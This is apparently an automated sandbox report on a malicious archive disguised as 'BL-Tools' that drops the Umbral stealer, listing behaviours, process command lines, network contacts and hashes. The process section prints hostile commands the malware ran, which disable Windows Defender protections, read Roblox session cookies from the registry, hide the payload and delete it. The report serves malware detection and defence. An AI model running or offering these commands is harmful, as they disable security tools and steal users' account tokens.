Analysis Overview
Threat Level: Known bad
The file https://files.catbox.moe/tmf8tc.rar was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Themida packer
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Checks BIOS information in registry
Checks whether UAC is enabled
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Runs ping.exe
Checks SCSI registry key(s)
Detects videocard installed
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-20 02:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 02:26
Reported
2024-06-20 02:31
Platform
win10v2004-20240611-en
Max time kernel
194s
Max time network
183s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133633240669077651" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://files.catbox.moe/tmf8tc.rar
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff5614ab58,0x7fff5614ab68,0x7fff5614ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4592 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4272 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap30767:74:7zEvent18656
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
"C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe"
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
"C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
"C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2416 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:2
C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
"C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.20.181.108.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
Files
\??\pipe\crashpad_2200_WNTNVASDSPTVJBJX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
